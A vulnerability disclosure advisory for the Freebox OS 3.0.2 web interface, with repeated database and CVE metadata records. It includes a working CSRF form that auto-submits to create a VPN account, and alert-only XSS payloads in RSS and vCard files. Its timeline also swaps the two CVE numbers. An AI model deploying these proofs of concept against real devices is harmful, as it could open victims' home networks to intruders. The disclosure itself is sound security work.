Hello list,
Here are two CVEs I reported to Freebox, a french ISP:
- CVE-2014-9382 - CSRF in VPN user account creation
- CVE-2014-9405 - XSS
Vulnerable product: Freebox OS Web interface 3.0.2.
CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation
====================
Risk level: High
Freebox allows users to create VPN connections to their home network.
In version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/:
{"login":"foo","password_set":false,"ip_reservation":"","password":"bar"}
This request is vulnerable to CSRF which is easy to trigger.
The following POC would create a new VPN account "ngocdh" / "1234=5678":
<html>
<body onload=vpn.submit()>
<form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain">
<input type="hidden" name="{&quot;login&quot;:&quot;ngocdh&quot;,&quot;password_set&quot;:false,&quot;ip_reservation&quot;:&quot;&quot;,&quot;password&quot;:&quot;1234" value="5678&quot;}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2
====================
Risk level: low
Two XSS instances with low probability of exploitation were found in the following places:
- Download RSS
- Contacts
The following POC demonstrates the XSS in the "description" field of a Download RSS item:
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>From Huy Ngoc</title>
<description>huyngocbk@gmail.com</description>
<link>http://google.com</link>
<atom:link rel="hub" href="http://google.com"/>
<atom:link rel="self" href="http://google.com"/>
<item>
<title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>
<pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>
<guid>http://google.com></guid>
</item>
</channel>
</rss>
In order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed.
The following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface:
BEGIN:VCARD
VERSION:3.0
FN:DAU Huy Ngoc
N:;;;;
URL:<img src=/ onerror='alert(document.domain);'>
END:VCARD
In order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf.
Timeline:
21/11/2014: XSS CVE-2014-9382 is reported to vendor
21/11/2014: vendor confirmed the vulnerability
02/12/2014: CSRF CVE-2014-9405 is reported to vendor
06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)
Credit: DAU Huy Ngoc (@ngocdh)
{"id": "SECURITYVULNS:DOC:32184", "bulletinFamily": "software", "title": "Freebox OS Web interface 3.0.2 XSS, CSRF", "description": "\r\n\r\nHello list, \r\n\r\nHere are two CVEs I reported to Freebox, a french ISP:\r\n - CVE-2014-9382 - CSRF in VPN user account creation\r\n - CVE-2014-9405 - XSS\r\n\r\nVulnerable product: Freebox OS Web interface 3.0.2.\r\n\r\nCVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation\r\n====================\r\nRisk level: High\r\n\r\nFreebox allows users to create VPN connections to their home network. \r\n\r\nIn version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/:\r\n\r\n{"login":"foo","password_set":false,"ip_reservation":"","password":"bar"}\r\n\r\nThis request is vulnerable to CSRF which is easy to trigger.\r\n\r\nThe following POC would create a new VPN account "ngocdh" / "1234=5678":\r\n\r\n<html>\r\n <body onload=vpn.submit()>\r\n <form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain">\r\n <input type="hidden" name="{&quot;login&quot;:&quot;ngocdh&quot;,&quot;password_set&quot;:false,&quot;ip_reservation&quot;:&quot;&quot;,&quot;password&quot;:&quot;1234" value="5678&quot;}" />\r\n <input type="submit" value="Submit request" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\n\r\nCVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2\r\n====================\r\nRisk level: low\r\n\r\nTwo XSS instances with low probability of exploitation were found in the following places:\r\n- Download RSS\r\n- Contacts\r\n\r\nThe following POC demonstrates the XSS in the "description" field of a Download RSS item:\r\n\r\n<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">\r\n<channel>\r\n<title>From Huy Ngoc</title>\r\n<description>huyngocbk@gmail.com</description>\r\n<link>http://google.com</link>\r\n<atom:link rel="hub" href="http://google.com"/>\r\n<atom:link rel="self" href="http://google.com"/>\r\n <item>\r\n <title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>\r\n <pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>\r\n <guid>http://google.com></guid>\r\n </item> \r\n</channel> \r\n</rss>\r\n\r\nIn order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed.\r\n\r\n\r\nThe following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface:\r\n\r\nBEGIN:VCARD\r\nVERSION:3.0\r\nFN:DAU Huy Ngoc\r\nN:;;;;\r\nURL:<img src=/ onerror='alert(document.domain);'>\r\nEND:VCARD\r\n\r\nIn order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf.\r\n\r\n\r\nTimeline:\r\n21/11/2014: XSS CVE-2014-9382 is reported to vendor\r\n21/11/2014: vendor confirmed the vulnerability\r\n02/12/2014: CSRF CVE-2014-9405 is reported to vendor\r\n06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)\r\n\r\nCredit: DAU Huy Ngoc (@ngocdh)\r\n\r\n", "published": "2015-06-08T00:00:00", "modified": "2015-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32184", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-9405", "CVE-2014-9382"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:59", "edition": 1, "viewCount": 41, "enchantments": {"score": {"value": 4.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-9382", "CVE-2014-9405"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14523"]}]}, "exploitation": null, "vulnersScore": 4.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645375345}}
{"packetstorm": [{"lastseen": "2016-12-05T22:14:53", "description": "", "published": "2015-06-02T00:00:00", "type": "packetstorm", "title": "FreeBox 3.0.2 Cross Site Request Forgery / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9405", "CVE-2014-9382"], "modified": "2015-06-02T00:00:00", "id": "PACKETSTORM:132121", "href": "https://packetstormsecurity.com/files/132121/FreeBox-3.0.2-Cross-Site-Request-Forgery-Cross-Site-Scripting.html", "sourceData": "`Hello list, \n \nHere are two CVEs I reported to Freebox, a french ISP: \n- CVE-2014-9382 - CSRF in VPN user account creation \n- CVE-2014-9405 - XSS \n \nVulnerable product: Freebox OS Web interface 3.0.2. \n \nCVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation \n==================== \nRisk level: High \n \nFreebox allows users to create VPN connections to their home network. \n \nIn version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/: \n \n{\"login\":\"foo\",\"password_set\":false,\"ip_reservation\":\"\",\"password\":\"bar\"} \n \nThis request is vulnerable to CSRF which is easy to trigger. \n \nThe following POC would create a new VPN account \"ngocdh\" / \"1234=5678\": \n \n<html> \n<body onload=vpn.submit()> \n<form name=\"vpn\" action=\"http://mafreebox.free.fr/api/v3/vpn/user/\" method=\"POST\" enctype=\"text/plain\"> \n<input type=\"hidden\" name=\"{\"login\":\"ngocdh\",\"password_set\":false,\"ip_reservation\":\"\",\"password\":\"1234\" value=\"5678\"}\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n \nCVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2 \n==================== \nRisk level: low \n \nTwo XSS instances with low probability of exploitation were found in the following places: \n- Download RSS \n- Contacts \n \nThe following POC demonstrates the XSS in the \"description\" field of a Download RSS item: \n \n<rss version=\"2.0\" xmlns:atom=\"http://www.w3.org/2005/Atom\"> \n<channel> \n<title>From Huy Ngoc</title> \n<description>huyngocbk@gmail.com</description> \n<link>http://google.com</link> \n<atom:link rel=\"hub\" href=\"http://google.com\"/> \n<atom:link rel=\"self\" href=\"http://google.com\"/> \n<item> \n<title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror=\"alert(document.domain)\">]]></description> \n<pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate> \n<guid>http://google.com></guid> \n</item> \n</channel> \n</rss> \n \nIn order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed. \n \n \nThe following VCF file demonstrates a XSS exploitation POC, \"alert(document.domain)\" would be called after importing this VCF file from the web interface: \n \nBEGIN:VCARD \nVERSION:3.0 \nFN:DAU Huy Ngoc \nN:;;;; \nURL:<img src=/ onerror='alert(document.domain);'> \nEND:VCARD \n \nIn order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf. \n \n \nTimeline: \n21/11/2014: XSS CVE-2014-9382 is reported to vendor \n21/11/2014: vendor confirmed the vulnerability \n02/12/2014: CSRF CVE-2014-9405 is reported to vendor \n06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867) \n \nCredit: DAU Huy Ngoc (@ngocdh) \n`\n", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132121/freebox-xssxsrf.txt"}], "cve": [{"lastseen": "2022-03-23T15:25:09", "description": "A Cross-Site Scripting (XSS) vulnerability exists in the description field of an Download RSS item or Contacts in Freebox OS Web interface 3.0.2, which allows malicious users to execute arbitrary code.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-06T22:15:00", "type": "cve", "title": "CVE-2014-9405", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9405"], "modified": "2020-01-13T19:11:00", "cpe": ["cpe:/a:free:freebox_os:3.0.2"], "id": "CVE-2014-9405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9405", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:free:freebox_os:3.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:24:31", "description": "Freebox OS Web interface 3.0.2 has CSRF which can allow VPN user account creation", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-01-13T14:15:00", "type": "cve", "title": "CVE-2014-9382", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9382"], "modified": "2020-01-23T13:23:00", "cpe": ["cpe:/a:free:freebox_os:3.0.2"], "id": "CVE-2014-9382", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9382", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:free:freebox_os:3.0.2:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2021-06-08T18:46:38", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2015-06-08T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-3154", "CVE-2014-9405", "CVE-2015-3624", "CVE-2015-3648", "CVE-2015-4039", "CVE-2015-4337", "CVE-2014-9382", "CVE-2015-4084", "CVE-2015-4109", "CVE-2015-4336", "CVE-2015-3647", "CVE-2015-4038", "CVE-2015-3001", "CVE-2015-0850", "CVE-2015-4010", "CVE-2015-4153", "CVE-2015-4338", "CVE-2015-4050"], "modified": "2015-06-08T00:00:00", "id": "SECURITYVULNS:VULN:14523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14523", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}